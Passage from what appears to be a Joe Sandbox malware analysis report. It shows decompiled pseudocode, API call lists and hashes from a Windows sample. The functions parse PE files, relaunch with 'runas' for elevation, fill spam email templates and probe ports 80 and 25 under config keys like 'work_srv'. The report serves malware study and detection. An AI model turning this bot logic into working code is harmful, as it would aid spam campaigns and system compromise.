                                                                                • API String ID: 929413710-2099955842
                                                                                • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040675C Relevance: 19.7, APIs: 13, Instructions: 199fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040675C(CHAR* _a4, long* _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				struct _OVERLAPPED* _v24;
				long _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				void _v68;
				long _v72;
				void _v132;
				intOrPtr _v320;
				signed int _v360;
				signed int _v374;
				void _v380;
				void* _t85;
				long _t88;
				long _t102;
				struct _OVERLAPPED* _t103;
				long _t115;
				long _t120;
				signed int _t143;
				void* _t146;

				_v16 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 0x80);
				}
				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				_v12 = _t85;
				if(_t85 == 0xffffffff) {
					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
				}
				if(_a12 != 0) {
					SetFileAttributesA(_a4, 2);
				}
				if(_v12 != 0xffffffff) {
					_t88 = GetFileSize(_v12, 0);
					_v8 = _t88;
					if(_t88 == 0xffffffff || _t88 == 0) {
						L31:
						_v8 = 0;
					} else {
						_a12 = 0;
						_v28 = 0;
						if(ReadFile(_v12,  &_v132, 0x40,  &_a12, 0) == 0 || SetFilePointer(_v12, _v72, 0, 0) == 0xffffffff || ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0) == 0 || SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0) == 0xffffffff) {
							goto L31;
						} else {
							_v20 = 0;
							_v24 = 0;
							if(0 < _v374) {
								while(1) {
									_t115 = 0x28;
									_a12 = _t115;
									if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
										break;
									}
									_t143 = _v374 & 0x0000ffff;
									if(_v24 != _t143 - 1) {
										_t120 = _v48 + _v52;
									} else {
										_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
									}
									_a12 = _t120;
									if(_v20 < _t120) {
										_v20 = _t120;
									}
									_v24 = _v24 + 1;
									if(_v24 < _t143) {
										continue;
									} else {
									}
									goto L23;
								}
								_v8 = 0;
							}
							L23:
							if(_v24 >= (_v374 & 0x0000ffff)) {
								_t102 = _v20;
								if(_v8 > _t102) {
									_v8 = _t102;
								}
								_t103 = E0040EBCC(_v8);
								_v16 = _t103;
								if(_t103 == 0) {
									goto L31;
								} else {
									if(SetFilePointer(_v12, 0, 0, 0) == 0xffffffff) {
										L30:
										_v8 = 0;
										E0040EC2E(_v16);
										_v16 = 0;
									} else {
										_t146 = _v16;
										if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
											goto L30;
										} else {
											 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
											_v8 = _v20;
										}
									}
								}
							}
						}
					}
					CloseHandle(_v12);
				}
				 *_a8 = _v8;
				return _v16;
			}



























                                                                                0x0040676a
                                                                                0x0040676d
                                                                                0x00406778
                                                                                0x0040677e
                                                                                0x0040677e
                                                                                0x0040679a
                                                                                0x0040679c
                                                                                0x004067a2
                                                                                0x004067b2
                                                                                0x004067b2
                                                                                0x004067b8
                                                                                0x004067bf
                                                                                0x004067bf
                                                                                0x004067c9
                                                                                0x004067d3
                                                                                0x004067d9
                                                                                0x004067df
                                                                                0x0040696b
                                                                                0x0040696b
                                                                                0x004067ed
                                                                                0x00406801
                                                                                0x00406804
                                                                                0x0040680b
                                                                                0x00000000
                                                                                0x00406867
                                                                                0x00406869
                                                                                0x0040686c
                                                                                0x00406876
                                                                                0x00406878
                                                                                0x0040687a
                                                                                0x00406881
                                                                                0x0040688f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406891
                                                                                0x0040689e
                                                                                0x004068ba
                                                                                0x004068a0
                                                                                0x004068b2
                                                                                0x004068b2
                                                                                0x004068bd
                                                                                0x004068c3
                                                                                0x004068c5
                                                                                0x004068c5
                                                                                0x004068c8
                                                                                0x004068ce
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004068d0
                                                                                0x00000000
                                                                                0x004068ce
                                                                                0x004068d2
                                                                                0x004068d2
                                                                                0x004068d5
                                                                                0x004068df
                                                                                0x004068e5
                                                                                0x004068eb
                                                                                0x004068ed
                                                                                0x004068ed
                                                                                0x004068f3
                                                                                0x004068f9
                                                                                0x004068fe
                                                                                0x00000000
                                                                                0x00406900
                                                                                0x0040690b
                                                                                0x0040695a
                                                                                0x0040695d
                                                                                0x00406960
                                                                                0x00406966
                                                                                0x0040690d
                                                                                0x0040690d
                                                                                0x00406920
                                                                                0x00000000
                                                                                0x00406922
                                                                                0x0040694f
                                                                                0x00406955
                                                                                0x00406955
                                                                                0x00406920
                                                                                0x0040690b
                                                                                0x004068fe
                                                                                0x004068df
                                                                                0x0040680b
                                                                                0x00406971
                                                                                0x00406971
                                                                                0x0040697f
                                                                                0x00406986

                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0040677E
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0040679A
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 004067B0
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 004067BF
                                                                                • GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 004067D3
                                                                                • ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,74CB43E0,00000000), ref: 00406807
                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040681F
                                                                                • ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0040683E
                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040685C
                                                                                • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,74CB43E0,00000000), ref: 0040688B
                                                                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,74CB43E0,00000000), ref: 00406906
                                                                                • ReadFile.KERNEL32(000000FF,?,00000000,00408244,00000000,?,74CB43E0,00000000), ref: 0040691C
                                                                                • CloseHandle.KERNEL32(000000FF,?,74CB43E0,00000000), ref: 00406971
                                                                                  • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                  • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Read$Pointer$AttributesCreateHeap$CloseFreeHandleProcessSize
                                                                                • String ID:
                                                                                • API String ID: 2622201749-0
                                                                                • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409326 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E00409326(void* __ecx, void* __edx) {
				void* __ebx;
				char _t88;
				void* _t89;
				int _t92;
				void* _t96;
				signed int _t97;
				signed int _t100;
				signed int _t103;
				char* _t106;
				char* _t111;
				signed int _t112;
				char* _t116;
				signed int _t117;
				int _t119;
				void* _t146;
				signed int _t155;
				int _t161;
				signed int _t165;
				signed int _t167;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;

				_t146 = __ecx;
				_t168 = _t170 - 0x60;
				E00401910(0x19bc);
				 *(_t168 - 0x58) = 0x9c;
				if(GetVersionExA(_t168 - 0x58) == 0) {
					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
					_t9 = _t168 + 0x58;
					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
					__eflags =  *_t9;
				} else {
					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
				}
				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
				if(_t88 == 0) {
					 *(_t168 - 0x15c) = _t88;
				}
				_push( *((intOrPtr*)(_t168 + 0x70)));
				_t89 = _t168 - 0x15c;
				if( *(_t168 + 0x78) == 0) {
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
					_t172 = _t170 + 0x40;
				} else {
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
					_t172 = _t170 + 0x38;
				}
				 *(_t168 + 0x78) = _t92;
				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
				_t173 = _t172 + 0xc;
				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
					_push(_t168 - 0x15c);
					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
					_t173 = _t173 + 0x50;
				}
				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
				 *(_t168 + 0x5c) = E00406EDD();
				if( *(_t168 + 0x58) < 0x60) {
					_t165 =  *(_t168 + 0x78);
					_t161 = 0;
					__eflags = 0;
					L33:
					__eflags =  *(_t168 + 0x5c) - _t161;
					if( *(_t168 + 0x5c) == _t161) {
						L38:
						_push(_t168 - 0x95c);
						_push(_t161);
						L39:
						_t96 = E004091EB();
						__eflags =  *0x412180 - _t161; // 0x0
						if(__eflags != 0) {
							 *0x412180 =  *0x412180 | _t165;
							__eflags =  *0x412180;
						}
						__eflags = _t96 - 0x2a;
						_t81 = _t96 == 0x2a;
						__eflags = _t81;
						_t97 = 0 | _t81;
						L42:
						return _t97;
					}
					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
					__eflags = _t100;
					if(_t100 != 0) {
						_push(_t168 - 0x95c);
						_push("runas");
						goto L39;
					}
					_t103 =  *(_t168 + 0x78) | 0x61040000;
					__eflags = _t103;
					 *0x412180 = _t103;
					 *0x41217c =  *(_t168 + 0x54);
					if(_t103 != 0) {
						 *0x412180 = _t103 | _t165;
					}
					L31:
					_t97 = 0;
					goto L42;
				}
				 *(_t168 + 0x4c) = 4;
				 *(_t168 + 0x44) = 5;
				 *(_t168 + 0x48) = 1;
				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
				_t175 = _t173 + 0x14;
				if(RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50) == 0) {
					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
					_t176 = _t175 + 0x14;
					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c);
					__eflags = _t112;
					if(_t112 == 0) {
						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
						_t176 = _t176 + 0x14;
						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c);
						__eflags = _t117;
						if(_t117 != 0) {
							 *(_t168 + 0x78) = 0x3000;
						}
					} else {
						 *(_t168 + 0x78) = 0x2000;
					}
					RegCloseKey( *(_t168 + 0x50));
					_t165 =  *(_t168 + 0x78);
				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x41217c = _t119;
						_t167 = _t165 | 0x61040106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x41217c = _t161;
							_t167 = _t165 | 0x61040107;
							L30:
							 *0x412180 = _t167;
							goto L31;
						}
						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x61040000;
							 *0x412180 = _t155;
							 *0x41217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x412180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}




























                                                                                0x00409326
                                                                                0x00409327
                                                                                0x00409330
                                                                                0x00409339
                                                                                0x00409348
                                                                                0x00409358
                                                                                0x0040935c
                                                                                0x0040935c
                                                                                0x0040935c
                                                                                0x0040934a
                                                                                0x00409353
                                                                                0x00409353
                                                                                0x00409375
                                                                                0x0040937d
                                                                                0x0040937f
                                                                                0x0040937f
                                                                                0x0040938c
                                                                                0x00409394
                                                                                0x004093a2
                                                                                0x004093d9
                                                                                0x004093dc
                                                                                0x004093dd
                                                                                0x004093e0
                                                                                0x004093e3
                                                                                0x004093e6
                                                                                0x004093e9
                                                                                0x004093ec
                                                                                0x0040940c
                                                                                0x00409412
                                                                                0x004093a4
                                                                                0x004093a4
                                                                                0x004093a5
                                                                                0x004093a8
                                                                                0x004093ab
                                                                                0x004093ae
                                                                                0x004093b1
                                                                                0x004093ce
                                                                                0x004093d4
                                                                                0x004093d4
                                                                                0x0040941d
                                                                                0x00409420
                                                                                0x00409425
                                                                                0x0040942c
                                                                                0x00409441
                                                                                0x0040945d
                                                                                0x0040946b
                                                                                0x0040948d
                                                                                0x0040949b
                                                                                0x004094a0
                                                                                0x004094a0
                                                                                0x004094a3
                                                                                0x004094b0
                                                                                0x004094b3
                                                                                0x0040962f
                                                                                0x00409632
                                                                                0x00409632
                                                                                0x00409634
                                                                                0x00409634
                                                                                0x00409637
                                                                                0x0040967b
                                                                                0x00409681
                                                                                0x00409682
                                                                                0x00409683
                                                                                0x00409683
                                                                                0x0040968a
                                                                                0x00409690
                                                                                0x00409692
                                                                                0x00409692
                                                                                0x00409692
                                                                                0x0040969a
                                                                                0x0040969d
                                                                                0x0040969d
                                                                                0x004096a0
                                                                                0x004096a2
                                                                                0x004096a9
                                                                                0x004096a9
                                                                                0x00409641
                                                                                0x00409648
                                                                                0x0040964a
                                                                                0x00409673
                                                                                0x00409674
                                                                                0x00000000
                                                                                0x00409674
                                                                                0x00409652
                                                                                0x00409652
                                                                                0x00409657
                                                                                0x0040965c
                                                                                0x00409662
                                                                                0x00409666
                                                                                0x00409666
                                                                                0x0040962b
                                                                                0x0040962b
                                                                                0x00000000
                                                                                0x0040962b
                                                                                0x004094ce
                                                                                0x004094d5
                                                                                0x004094dc
                                                                                0x004094e3
                                                                                0x004094e8
                                                                                0x004094f9
                                                                                0x0040951a
                                                                                0x0040951f
                                                                                0x00409526
                                                                                0x0040952c
                                                                                0x0040952e
                                                                                0x00409551
                                                                                0x00409556
                                                                                0x0040955d
                                                                                0x00409563
                                                                                0x00409565
                                                                                0x00409567
                                                                                0x00409567
                                                                                0x00409530
                                                                                0x00409530
                                                                                0x00409530
                                                                                0x00409571
                                                                                0x00409577
                                                                                0x004094fb
                                                                                0x004094fb
                                                                                0x004094fb
                                                                                0x0040957a
                                                                                0x0040957f
                                                                                0x0040958d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409597
                                                                                0x0040959a
                                                                                0x0040961a
                                                                                0x0040961f
                                                                                0x0040961f
                                                                                0x00000000
                                                                                0x004095a3
                                                                                0x004095c0
                                                                                0x0040960c
                                                                                0x00409612
                                                                                0x00409625
                                                                                0x00409625
                                                                                0x00000000
                                                                                0x00409625
                                                                                0x004095d1
                                                                                0x004095db
                                                                                0x004095e7
                                                                                0x004095ed
                                                                                0x004095f3
                                                                                0x004095f9
                                                                                0x00409601
                                                                                0x00409601
                                                                                0x004095f9
                                                                                0x00000000
                                                                                0x004095db
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
                                                                                • wsprintfA.USER32 ref: 004093CE
                                                                                • wsprintfA.USER32 ref: 0040940C
                                                                                • wsprintfA.USER32 ref: 0040948D
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                • String ID: runas
                                                                                • API String ID: 3696105349-4000483414
                                                                                • Opcode ID: 6d5a3b4efbc2d97667e0e89406f7bd4dba45429abf12630261af7769a952681c
                                                                                • Instruction ID: 03442aab56affe776738d217652d29bf499ebc974a67126763565949ba301525
                                                                                • Opcode Fuzzy Hash: 6d5a3b4efbc2d97667e0e89406f7bd4dba45429abf12630261af7769a952681c
                                                                                • Instruction Fuzzy Hash: 53A171B2540208BBEB21DFA1CC45FDF3BACAB44344F104437FA05E6192D7B999848FA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B3C5 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v132;
				void* _t46;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
				E0040EF00( &_v132, "%FROM_EMAIL");
				E00405CE1( &_v132, 0x64, _a16, 0, 0);
				_t71 = E0040ED03( &_v132, 0x40);
				_t77 = _t76 + 0x38;
				_t83 = _t71;
				if(_t71 != 0) {
					_t7 = _t71 + 1; // 0x1
					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
					 *_t71 = 0;
					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
					_t77 = _t77 + 0x28;
				}
				_t72 = _a12;
				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
				_t73 = _a4;
				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
				_t46 = E0040F0CB( &_v132);
				_push(0);
				_push( &_v132);
				_push(_t46);
				E0040F133();
				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
				_push(_t73);
				E0040AD89( &_v132, _t83);
				E0040B211(0,  &_v132, 0);
				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 5);
				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
				E0040B211(0,  &_v132, 0xfffffffb);
				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
				_t75 = _a8;
				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
				return _t75;
			}











                                                                                0x0040b3e1
                                                                                0x0040b3ef
                                                                                0x0040b3ff
                                                                                0x0040b40f
                                                                                0x0040b411
                                                                                0x0040b414
                                                                                0x0040b416
                                                                                0x0040b41a
                                                                                0x0040b426
                                                                                0x0040b439
                                                                                0x0040b43b
                                                                                0x0040b440
                                                                                0x0040b440
                                                                                0x0040b443
                                                                                0x0040b453
                                                                                0x0040b467
                                                                                0x0040b47b
                                                                                0x0040b485
                                                                                0x0040b48e
                                                                                0x0040b49a
                                                                                0x0040b49f
                                                                                0x0040b4a3
                                                                                0x0040b4a4
                                                                                0x0040b4a5
                                                                                0x0040b4b6
                                                                                0x0040b4bb
                                                                                0x0040b4bc
                                                                                0x0040b4c7
                                                                                0x0040b4d8
                                                                                0x0040b4e7
                                                                                0x0040b4f8
                                                                                0x0040b504
                                                                                0x0040b515
                                                                                0x0040b51e
                                                                                0x0040b52b
                                                                                0x0040b534

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0040B467
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$wsprintf
                                                                                • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                • API String ID: 1220175532-2340906255
                                                                                • Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                • Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
                                                                                • Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                • Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E31FFD Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 205libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 00E3202D
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00E3204F
                                                                                • GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 00E3206A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00E32071
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00E32082
                                                                                • GetTickCount.KERNEL32 ref: 00E32230
                                                                                  • Part of subcall function 00E31E46: GetComputerNameA.KERNEL32(?,0000000F), ref: 00E31E7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                • String ID: flags_upd$hi_id$localcfg$work_srv
                                                                                • API String ID: 4207808166-1391650218
                                                                                • Opcode ID: cfd6ca314c388c613506591f5712bf4136308cb82e64ba9d4401f64ea173d9f9
                                                                                • Instruction ID: a1db0ba0bbd13a64a521efe89adb46942bbcad83b6a9b5615ac5858b48e7d099
                                                                                • Opcode Fuzzy Hash: cfd6ca314c388c613506591f5712bf4136308cb82e64ba9d4401f64ea173d9f9
                                                                                • Instruction Fuzzy Hash: 5651A5B0900344AFE330AF758C8EF67BEECEB54708F00591DFA96A2252D7B5A944C765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402011 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 160COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E00402011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x4122f4 & 0x00000001) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000001;
					 *0x4122f0 = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000002) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000002;
					 *0x4122ec = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000004) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000004;
					 *0x4122e8 = E0040F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x4122e0 > 0xdbba0) {
					_t58 =  *0x412000; // 0x410288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x412000;
						do {
							if(E00402684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00401978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x412000 + _t103 * 4;
						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x4122e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
					_t53 =  *0x412000; // 0x410288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x412000;
						do {
							if(E00402EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00401978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x412000 + _t102 * 4;
						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x4122dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
				_t45 = E0040F04E(0) -  *0x4122f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x4122e4; // 0x0
